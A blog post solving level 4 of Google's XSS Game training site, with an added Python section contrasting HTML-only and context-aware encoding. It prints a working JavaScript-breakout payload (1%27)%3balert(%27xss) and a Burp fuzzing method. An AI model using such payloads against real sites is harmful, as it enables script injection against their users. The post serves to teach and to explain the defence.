Sunday, 7 June 2015

XSS Methodology - Google XSS Challenge 4.

Hi All,

It has been a long time since I have put up a post, so it needs to be a decent one :-) and what better way than to explain the methodology that I used whilst solving the Google XSS Game challenge #4. I did use all of the hints as I was really stumped as to what to do. Anyway, below is my methodology.

So when looking at any XSS challenge you should have the following:
  • An interception proxy;
  • A browser which will not filter out your XSS; and
  • A JS console (I use Firebug).
Admittedly, when I started this challenge I didn't think to use the JS console when testing for XSS, but I will definitely use it from now on.

Without going into details about correct encoding, it is safe to say that when non-alphanumeric chars are properly escaped, i.e. " is &quot; and < and > are &lt; and &gt;, then it is harder to inject JS.

Step 1: Find out where our string is injected in the source code
I injected 'ZZ' as this is fairly obvious to find. It looks like it is injected into startTimer and into the div with id 'message'. We are more interested in the onload function as this is JS.


If you did not notice, the characters '); are appended after your string, so we will need to work around them.


Step 2: Check what non-alphanumeric characters are being encoded.
Open up Python and type the following to grab all the non-alphanumeric chars.

Each line of code does the following:
# Import the string module
# Create a file to write to
# Slice the printable chars so you only have the non-alphanumeric characters (string.printable[62:94] is the 32 punctuation characters, the same as string.punctuation), then iterate through each
# Write each character to the file, including a new line after each
# Close the file after writing

>>> import string
>>> fdesc = open("nonalphanumeric.txt", "w")
>>> for i in string.printable[62:94]:
...     fdesc.write(i + "\n")
...
>>> fdesc.close()

You should now have a file that you can test with to see what chars are being encoded. Keep it in a safe spot for future tests ;).

Run Burp Intruder, load the file as the payload list and fuzz the 'timer' param.

If your response contains something like '&#x27;' then the character is being HTML-entity encoded and the browser will correctly render it as a literal character (this is a hint that Google provides).

After running Burp Suite through all of the chars I noticed that the single quote was not being encoded correctly. Here is the HTML response after injecting a single quote ':

<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />

    <script>
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() {
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    </script>
  </head>
  <body id="level4">
    <img src="/static/logos/level4.png" />
    <br>
    <img src="/static/loading.gif" onload="startTimer('&#39;');" />
    <br>
    <div id="message">Your timer will execute in &#39; seconds.</div>
  </body>
</html>

So I reran the request in the browser whilst the Firebug console was open to see if any error messages were logged.

 
This is a sign that the single quote was injected and parsed as JS.  So where to next?

Open up the console and type in the startTimer function (from the page source above) so you have a copy to muck around with. Make sure you click 'Run'.


If you passed no value to the timer param, i.e. http://xss-game.appspot.com/level4/frame?timer= , you would have the following startTimer script in the source code:

startTimer(' ')

How do we create an attack? Create two JS calls in one. What I typed is shown below:
startTimer('1');alert('1')

Execute and you get your alert.

Now we need to add this to the timer param for it to execute:
http://xss-game.appspot.com/level4/frame?timer=1');alert('1')

But it seems not to work, as all chars after the ';' are removed.
 

How do we solve this? We URL-encode the non-alphanumeric chars so the attack string looks like this:
timer=1%27)%3balert(%27xss

In the source code we get the following.
<img src="/static/loading.gif" onload="startTimer('1&#39;);alert(&#39;xss');" />

Boom XSS

Now copy the following string into the address bar and you will pass challenge 4.

http://xss-game.appspot.com/level4/frame?timer=1%27)%3balert(%27xss
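The reason the &#39; in the page source does not help is worth seeing in code: the HTML parser decodes entities in the attribute value before the JS engine ever sees the handler, so a literal quote still lands inside the startTimer('...') string. The following is an added example, not code from the post or from the xss-game project. It models the level-4 page with two constructed render functions (the real server code is not available), repeats Step 2 of the post offline against that model, decodes the post's final timer value, and contrasts the page's HTML-only encoding with context-aware encoding (json.dumps for the JS string literal, then html.escape for the attribute). The helper names render_vulnerable, render_hardened, raw_attr, as_seen_by_js, reflected_unchanged and argument_confined are this example's own.

```python
# Added example (not code from the original post or from the xss-game project):
# an offline model of the level-4 page showing why HTML-entity encoding alone
# does not protect a JavaScript string inside an onload attribute, and what
# context-aware encoding looks like. The two render functions are constructed
# to match the HTML quoted in the post; the real server code is not available.
import html
import json
import string
from urllib.parse import unquote

# The post's slice string.printable[62:94] is exactly the 32 punctuation chars.
PUNCT = string.printable[62:94]
assert PUNCT == string.punctuation

# The post's final timer value, still URL-encoded as it appears in the address bar.
PAYLOAD_PARAM = "1%27)%3balert(%27xss"


def decoded_payload() -> str:
    """The timer value as the server sees it after URL decoding."""
    return unquote(PAYLOAD_PARAM)


def render_vulnerable(timer: str) -> str:
    """Model of the original page: entity-encode the parameter (Python emits
    &#x27; where the post's page shows &#39;; both decode to a quote) and drop
    it into a JS string literal inside the attribute."""
    value = html.escape(timer, quote=True)
    return '<img src="/static/loading.gif" onload="startTimer(' + "'" + value + "'" + ');" />'


def render_hardened(timer: str) -> str:
    """Context-aware encoding: json.dumps makes the value a safe JS string
    literal (quotes, backslashes, control and non-ASCII chars escaped), then the
    whole handler is HTML-encoded for the attribute context."""
    js_call = "startTimer(" + json.dumps(timer) + ");"
    return '<img src="/static/loading.gif" onload="' + html.escape(js_call, quote=True) + '" />'


def raw_attr(tag: str) -> str:
    """The onload value exactly as written in the HTML, entities intact."""
    start = tag.index('onload="') + len('onload="')
    return tag[start:tag.index('"', start)]


def as_seen_by_js(tag: str) -> str:
    """What the JS engine receives: the HTML parser decodes entities in the
    attribute value before handing the handler body to the script engine."""
    return html.unescape(raw_attr(tag))


def reflected_unchanged(render, decode_entities: bool) -> set:
    """Step 2 of the post, offline: reflect each punctuation character and
    report which ones come back literally, either in the raw HTML
    (decode_entities=False) or in the JS source the browser executes (True).
    The post's own 'ZZ' probe is used to locate the injection point."""
    view = html.unescape if decode_entities else (lambda s: s)
    head, tail = view(raw_attr(render("ZZ"))).split("ZZ")
    return {ch for ch in PUNCT if view(raw_attr(render(ch))) == head + ch + tail}


def argument_confined(handler_js: str) -> bool:
    """Scan the first JS string literal after 'startTimer(' with JS rules
    (backslash escapes, matching quote) and report whether exactly ');'
    follows, i.e. whether the parameter stayed inside the literal."""
    i = handler_js.index("startTimer(") + len("startTimer(")
    quote = handler_js[i]
    if quote not in "'\"":
        return False
    i += 1
    while i < len(handler_js):
        if handler_js[i] == "\\":
            i += 2          # an escaped character can never close the literal
            continue
        if handler_js[i] == quote:
            return handler_js[i + 1:] == ");"
        i += 1
    return False            # unterminated literal: a syntax error in the browser


def main() -> None:
    in_html = reflected_unchanged(render_vulnerable, decode_entities=False)
    in_js = reflected_unchanged(render_vulnerable, decode_entities=True)
    print("entity-encoded in the HTML:      ", "".join(sorted(set(PUNCT) - in_html)))
    print("reaching the JS engine unchanged:", "".join(sorted(in_js)))
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        handler = as_seen_by_js(render(decoded_payload()))
        print(f"{name:10s} {handler}  confined: {argument_confined(handler)}")


if __name__ == "__main__":
    main()
```

Running it shows the two views side by side: in the raw HTML only & < > " ' come back entity-encoded (which is what Burp Intruder reports), but after the attribute is decoded all 32 punctuation characters reach the JS engine unchanged, and both ' and \ are able to break the string literal in the vulnerable model. With the hardened render the same timer value becomes startTimer("1');alert('xss"), a single call whose argument parseInt reduces to 1. A stricter fix still is to avoid inline event handlers altogether and read the value from a data attribute with addEventListener, which also lets a Content Security Policy forbid inline script.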

Hopefully this has been informative for you :). Hack responsibly; if you have a hacking addiction please phone the help line: 1800 CNTSTPHACKING